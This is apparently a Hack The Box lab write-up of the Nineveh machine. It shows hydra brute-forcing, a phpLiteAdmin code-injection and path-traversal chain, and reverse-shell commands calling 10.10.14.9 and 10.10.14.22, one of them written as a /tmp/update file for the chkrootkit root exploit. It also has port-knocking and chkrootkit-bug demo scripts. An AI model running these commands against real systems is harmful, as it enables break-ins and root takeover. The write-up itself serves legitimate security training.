
Linux/Nineveh

Nineveh

Enumeration

nmap

Start with a plain nmap scan of the common ports. Only 80 and 443 are open, and I skipped the detailed version/script scan for now.

┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
└─$ nmap 10.10.10.43
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-01 01:42 EDT
Nmap scan report for 10.10.10.43
Host is up (0.45s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
Nmap done: 1 IP address (1 host up) scanned in 36.22 seconds

The two ports serve different content. Port 80 shows the following:

Port 443 shows the following:

Neither page has anything of interest, so enumerate directories on both with gobuster (-k skips certificate verification on the self-signed HTTPS side):

gobuster dir --url http://10.10.10.43 --wordlist /usr/share/dirb/wordlists/big.txt -o dir.80
gobuster dir --url https://10.10.10.43 --wordlist /usr/share/dirb/wordlists/big.txt -o dir.443 -k

The port 80 scan turns up /department, which redirects to /department/login.php. Logging in with the common pair admin/123456 returns "invalid password", while a made-up username such as vegetable returns "invalid username". The two distinct error messages confirm that admin is a valid username (a classic username-enumeration weakness in a login form).

With no password, and not wanting to brute-force just yet, I checked the port 443 directory results instead and found /db, which shows the following page:

phpLiteAdmin is a web-based SQLite database management tool written in PHP that supports SQLite3 and SQLite2. In the spirit of SQLite's flat-file design, phpLiteAdmin consists of a single source file, phpliteadmin.php, which is dropped into a directory on the server and then opened in a browser.

Because it is well known and widely deployed, and the login page already reveals the version, search for known vulnerabilities.

Exploitation

PHPLiteAdmin 1.9.3 - Remote PHP Code Injection

The last result is the interesting one: the version matches and it gives command execution, but it requires a login first. phpLiteAdmin only asks for a password, so it can be brute-forced with hydra. Hydra still insists on a username (-l) even though the form never sends one, so I just passed admin. A small wordlist gave the answer almost immediately.

┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
└─$ hydra 10.10.10.43 -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 03:42:54
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
[443][http-post-form] host: 10.10.10.43   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 03:43:34

The password is found quickly. Log in with password123 and follow PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com):

1. Create a new database named hack.php

2. Create a new table with a field of type TEXT whose default Value is the PHP payload (shown in the original screenshot)

3. Once it is created, click Rename Database to see the on-disk path of the database file

But that file cannot be reached over the web, so the trail goes cold here. Back to port 80: since admin is known to be a valid username, brute-force that login too. It finishes very quickly.

┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 04:53:05
[DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
[DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=admin&password=^PASS^:Invalid Password
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 04:53:19

Log in with those credentials. Under Notes there is the text below: it mentions a secret folder, and the format of the URL looks like a local file inclusion (LFI).

Requesting manage.php?notes=../../../../../../../etc/passwd directly only returns "No Note is selected", and putting /files/ninevehNotes.txt in front of it produces an error instead. After some trial and error, appending seven ../ after the .txt successfully includes the file: the parameter evidently has to contain the string ninevehNotes, while the rest of the path is free for traversal.

But when I tried manage.php?notes=files/ninevehNotes/../../../../../../../var/tmp/hack.php to include the hack.php created earlier, it displayed "File name too long." Dropping one ../ included hack.php successfully, and commands can be executed through it.

Build a reverse shell with Online - Reverse Shell Generator (revshells.com); after it runs, the listener receives a shell.

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.14.9%204444%20%3E%2Ftmp%2Ff

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 33734
bash: cannot set terminal process group (1412): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nineveh:/var/www/html/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<tml/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@nineveh:/var/www/html/department$ ^Z
zsh: suspended  nc -nvlp 4444

┌──(kali㉿kali)-[~]
└─$ stty raw -echo;fg
[1]  + continued  nc -nvlp 4444
reset
reset: unknown terminal type unknown
Terminal type? screen

Privilege Escalation

steghide

With a www-data shell, the directory /var/www/ssl/secure_notes contains an image, nineveh.png. Running cat on it dumps an RSA private key embedded at the end of the file; strings gives a cleaner view of the same thing. Copy the private key to the Kali machine and chmod 600 it so it can be used for SSH later.

port knocking

The initial nmap scan showed no port 22, yet sshd is listening on the box, so the firewall is hiding it and port knocking is required.

www-data@nineveh:/var/www/ssl/secure_notes$ netstat -anultp | grep 22
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

knockd watches for connection attempts arriving in a specific order and, when it sees the right sequence, adjusts firewall rules. Its configuration is below: if ports 571, 290 and 911 receive a SYN in that order within 5 seconds, an iptables rule is inserted that lets the knocking source IP reach port 22; the reverse sequence removes the rule again. Note the file is world-readable, so anyone with a local shell learns the sequence.

www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
[options]
    logfile = /var/log/knockd.log
    interface = ens160

[openSSH]
    sequence = 571, 290, 911
    seq_timeout = 5
    start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn

[closeSSH]
    sequence = 911,290,571
    seq_timeout = 5
    start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags = syn

See Port knocking - ArchWiki (archlinux.org) for the procedure. Because the whole sequence has to land within 5 seconds, use a for loop to run nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 against each port in turn; once all three have been hit, port 22 is opened for our IP and the recovered id_rsa can be used to SSH in as amrois.

┌──(kali㉿kali)-[~]
└─$ for i in 571 290 911; do
nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43
done; ssh -i vegetable/HTB/Nineveh/id_rsa amrois@10.10.10.43
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
571/tcp filtered umeter

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
290/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
911/tcp filtered xact-backup

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.

You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$
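The author's loop hard-codes the three ports. As an added example (not the writeup's own code), the script below reads the sequence straight out of a copy of the target's knockd.conf, replays it with a single SYN per port, and then checks whether 22/tcp answers. It assumes nc (netcat) on the attacking machine, as on Kali, in place of the nmap calls used above; the section name openSSH and the field names come from the config shown on the page.

```shell
#!/bin/sh
# Added example, not from the original post: parse knockd.conf and knock.
# Assumes a netcat that supports -z (connect only) and -w (timeout).

# Print the "sequence" of the named [section] as space-separated ports,
# e.g.  knockd_sequence ./knockd.conf openSSH  ->  571 290 911
# Handles both "571, 290, 911" and "911,290,571" spellings and indented lines.
knockd_sequence() {
    local conf="$1" section="$2"
    awk -v want="[$section]" '
        $1 == want                 { in_sec = 1; next }   # entered the wanted section
        $1 ~ /^\[/                 { in_sec = 0 }         # any other header ends it
        in_sec && $1 ~ /^sequence/ {
            sub(/^[^=]*=[[:space:]]*/, "")                # drop "sequence ="
            gsub(/[[:space:]]*,[[:space:]]*/, " ")        # commas -> single spaces
            sub(/[[:space:]]+$/, "")
            print
            exit
        }' "$conf"
}

# Send one SYN to each port in order. knockd matches on the SYN alone
# (tcpflags = syn), so it does not matter that the ports are filtered;
# -w 1 caps each attempt at a second so the run stays inside seq_timeout = 5.
knock() {
    local host="$1" port
    shift
    for port in "$@"; do
        nc -z -w 1 "$host" "$port" 2>/dev/null || true
    done
}

# Knock the openSSH sequence and report whether 22/tcp opened. The rule knockd
# inserts is per source IP (-s %IP%), so knock from the host that will SSH in.
knock_and_check() {
    local host="$1" conf="$2" seq
    seq=$(knockd_sequence "$conf" openSSH)
    # shellcheck disable=SC2086  -- splitting $seq into separate ports is intended
    knock "$host" $seq
    if nc -z -w 3 "$host" 22 2>/dev/null; then
        echo "22/tcp is open on $host; try: ssh -i id_rsa amrois@$host"
    else
        echo "22/tcp still closed on $host (check the order and seq_timeout)"
    fi
}

# Usage: ./knock.sh 10.10.10.43 ./knockd.conf   (a copy of the target's /etc/knockd.conf)
if [ "$#" -ge 2 ]; then
    knock_and_check "$1" "$2"
fi
```

Because the closeSSH sequence is also in the file, `knockd_sequence ./knockd.conf closeSSH` gives the ports to knock when you want the iptables rule removed again after the engagement.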

After logging in, user.txt is in the home directory.

chkrootkit

Upload linpeas.sh to enumerate the system. It points at a scheduled task: the /report directory keeps filling with report-*.txt files, and /usr/sbin/report-reset.sh periodically deletes them.

amrois@nineveh:/report$ ls -al
total 56
drwxr-xr-x  2 amrois amrois 4096 Apr  2 02:05 .
drwxr-xr-x 24 root   root   4096 Jan 29  2021 ..
-rw-r--r--  1 amrois amrois 4801 Apr  2 02:00 report-24-04-02:02:00.txt
-rw-r--r--  1 amrois amrois 4801 Apr  2 02:01 report-24-04-02:02:01.txt
-rw-r--r--  1 amrois amrois 4801 Apr  2 02:02 report-24-04-02:02:02.txt
-rw-r--r--  1 amrois amrois 4801 Apr  2 02:03 report-24-04-02:02:03.txt
-rw-r--r--  1 amrois amrois 4801 Apr  2 02:04 report-24-04-02:02:04.txt
-rw-r--r--  1 amrois amrois 4801 Apr  2 02:05 report-24-04-02:02:05.txt

Upload and run pspy: every minute a burst of processes appears, many of them invoking the chkrootkit tool. A quick search shows that chkrootkit has a known local privilege escalation vulnerability.

┌──(kali㉿kali)-[~]
└─$ searchsploit chkrootkit
------------------------------------------------------ ----------------------
 Exploit Title                                        |  Path
------------------------------------------------------ ----------------------
Chkrootkit - Local Privilege Escalation (Metasploit)  | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation          | linux/local/33899.txt
------------------------------------------------------ ----------------------
Shellcodes: No Results

The vulnerability (CVE-2014-0476, chkrootkit 0.49 and earlier) is that chkrootkit runs a file named /tmp/update if one exists, and since it is executed from root's cron every minute here, that file runs as root. So create a /tmp/update containing a reverse shell and make it executable (chmod +x /tmp/update); without the execute bit the shell cannot run it and nothing happens.

amrois@nineveh:/tmp$ cat update
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.22/443 0>&1

Within a minute or so the listener receives a shell as root.
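Why does a file in /tmp get executed at all? As an added example (not from the page and not chkrootkit's own source), the script below reproduces the shell mistake in a scratch directory: chkrootkit 0.49's slapper() check builds a list of suspicious files with the unquoted assignment `file_port=$file_port $i`. While file_port is still empty the shell parses that line as `file_port= /tmp/update`, that is, "run /tmp/update with file_port set in its environment". The hardened version next to it differs only in quoting. The marker file and the second path in the loop are constructed for the demo.

```shell
#!/bin/sh
# Added example: the chkrootkit 0.49 word-splitting bug, vulnerable vs fixed.
# A mktemp directory stands in for /tmp; nothing here needs root.

# Plant an executable "update" that records that it ran. The +x matters:
# without it the shell cannot exec the file and the trick silently fails.
plant_update() {
    local dir="$1"
    printf '#!/bin/sh\necho ran > "%s/marker"\n' "$dir" > "$dir/update"
    chmod +x "$dir/update"
}

# Report whether the planted file executed: prints "ran" or "none".
marker_state() {
    if [ -f "$1/marker" ]; then cat "$1/marker"; else echo none; fi
}

# The vulnerable loop, shaped like chkrootkit 0.49's slapper().
# $dir/.bugtraq is a constructed stand-in for the other paths on its list.
vulnerable_slapper() {
    local dir="$1" file_port="" i
    for i in "$dir/update" "$dir/.bugtraq"; do
        if [ -f "$i" ]; then
            # shellcheck disable=SC2209
            file_port=$file_port $i      # BUG: after expansion $i is the command word
        fi
    done
    marker_state "$dir"
}

# The hardened loop: quoting keeps the whole line one assignment.
fixed_slapper() {
    local dir="$1" file_port="" i
    for i in "$dir/update" "$dir/.bugtraq"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"    # only appends to the list, executes nothing
        fi
    done
    marker_state "$dir"
}

# Usage: run_demo   -> "fixed: none" then "vulnerable: ran"
run_demo() {
    local dir
    dir=$(mktemp -d)
    plant_update "$dir"
    echo "fixed: $(fixed_slapper "$dir")"
    echo "vulnerable: $(vulnerable_slapper "$dir")"
    rm -rf "$dir"
}
```

The same pattern, an unquoted `VAR=$VAR $word`, is worth grepping for in any root-run shell script; it is exactly why a world-writable directory plus a predictable filename turned a rootkit checker into a root shell here.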

References:

phpLiteAdmin

PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com)

Online - Reverse Shell Generator (revshells.com)

Port knocking - ArchWiki (archlinux.org)

HTB: Nineveh | 0xdf hacks stuff
